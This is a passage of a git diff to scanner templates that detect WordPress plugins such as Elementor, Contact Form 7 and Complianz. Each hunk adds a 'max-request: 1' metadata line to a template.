+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
